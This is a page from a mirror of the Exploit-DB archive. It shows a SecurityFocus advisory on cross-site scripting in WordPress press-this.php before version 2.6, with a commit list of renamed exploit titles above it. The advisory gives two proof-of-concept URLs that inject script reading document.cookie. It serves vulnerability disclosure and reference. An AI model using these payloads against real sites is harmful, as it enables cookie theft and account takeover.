bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/32053.txt
Offensive Security 8f3ada9286 DB: 2017-05-05 
3 new exploits

Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free
Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free

Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free

WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit
WordPress 2.6.1 - SQL Column Truncation Admin Takeover Exploit

WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information
WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures

WordPress 2.8.1 - (url) Cross-Site Scripting
WordPress 2.8.1 - 'url' Cross-Site Scripting

WordPress 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution
WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution

WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)
WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)
Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-comments-post.php Remote File Inclusion
Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-feed.php Remote File Inclusion
Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-trackback.php Remote File Inclusion
Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-comments-post.php' Remote File Inclusion
Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-feed.php' Remote File Inclusion
Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-trackback.php' Remote File Inclusion

WordPress 2.x - PHP_Self Cross-Site Scripting
WordPress < 2.1.2  - PHP_Self Cross-Site Scripting

WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection
WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection
WordPress 4.6 - Unauthenticated Remote Code Execution
WordPress < 4.7.4 - Unauthorized Password Reset
2017-05-05 05:01:18 +00:00

10 lines
743 B
Text
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/30238/info
WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to WordPress 2.6 are vulnerable.
http://www.example.com/wp/wp-admin/press-this.php/?ajax=video&s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/wp/wp-admin/press-this.php/?ajax=thickbox&i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Reference in a new issue View git blame Copy permalink